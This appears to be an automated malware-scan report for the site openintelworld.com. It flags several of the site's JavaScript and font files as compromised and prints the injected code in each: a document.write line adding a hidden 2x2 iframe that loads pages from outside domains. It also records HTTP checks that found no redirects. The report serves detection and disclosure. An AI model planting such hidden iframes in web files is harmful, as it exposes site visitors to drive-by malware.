Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=openintelworld.com
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://openintelworld.com/ | 200 OK Content-Length: 50925 Content-Type: text/html | clean |
http://openintelworld.com/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94032 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205></iframe>');
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).doc ...[3643 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3364205 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205> | ||
http://openintelworld.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://openintelworld.com/js/jquery.parallax-1.1.js | 200 OK Content-Length: 2498 Content-Type: application/javascript | clean |
http://openintelworld.com/js/parallax-config.js | 200 OK Content-Length: 3129 Content-Type: application/javascript | clean |
http://openintelworld.com/js/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15791 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide( easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,enableKeyboardNav:true,onStart:function(){},onCancel:function(){},onComplete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/jquery.form.js | 200 OK Content-Length: 28560 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options }; } this.selected = select; } }); }; $.fn.ajaxSubmit.debug = false; function log() { if (!$.fn.ajaxSubmit.debug) return; var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/cufon-yui.js | 200 OK Content-Length: 18425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addE Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/Tekton_Pro_700.font.js | 200 OK Content-Length: 27444 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205></iframe>');
Cufon.registerFont({"w":186,"face":{"font-family":"Tekton Pro","font-weight":700,"font-stretch":"condensed","units-per-em":"360","panose-1":"2 15 6 6 2 2 8 2 9 4","ascent":"245","descent":"-115","x-height":"7","cap-height":"2","bbox":"-33 -270.463 222 105.318","underline-thickness":"18","underline-position":"-18 Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mattitucklionsclub.org/eaof.html?j=3364205 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mattitucklionsclub.org/eaof.html?j=3364205> | ||
http://openintelworld.com/js/custom.js | 200 OK Content-Length: 2430 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: interjeroidejos.com
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205></iframe>');
Cufon.replace('h1, h2, h3, h4, h5, h6, .button small', { fontFamily: 'HelveticaNeue Regular', hover: true }); Cufon.replace('h1 strong, h2 strong, h3 strong, h4 strong, h5 strong, h6 strong, .btn', { fontFamily: 'HelveticaNeue Bold', hover: true }); function goToByScroll(id){ $('html,body').animate({scrollTop: $("#"+id).offset().top},1700, 'easeInOutExpo'); } $(d ...[1565 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205></iframe> Malicious iFrame found. size: 2x2 src: http://interjeroidejos.com/aood.html?j=3364205 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://interjeroidejos.com/aood.html?j=3364205> | ||
http://openintelworld.com/js/chrome.js | 200 OK Content-Length: 8752 Content-Type: application/javascript | clean |
http://openintelworld.com/blog/ | 200 OK Content-Length: 20638 Content-Type: text/html | clean |
http://openintelworld.com/blog/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://openintelworld.com/blog/wp-content/themes/airlock/advance/plugins/flickrpress/flickr.js?ver=3.3.1 | 200 OK Content-Length: 1950 Content-Type: application/javascript | clean |
http://openintelworld.com/blog/wp-content/themes/airlock/common/js/jquery-ui.min.js?ver=1.8.12 | 200 OK Content-Length: 199940 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: openintelworld.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 17:56:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: openintelworld.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 17:56:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: openintelworld.com
Referer: http://www.google.com/search?q=openintelworld.com
Result:
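The response matches the first query; no suspicious redirects were found. This check only compares a direct visit with a visit carrying a search-engine Referer header, so it says nothing about the scripts flagged as malicious under "Scanned pages/files".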
GET / HTTP/1.1
Host: openintelworld.com
Referer: http://www.google.com/search?q=openintelworld.com
Result:
The result is similar to the first query. There are no suspicious redirects found.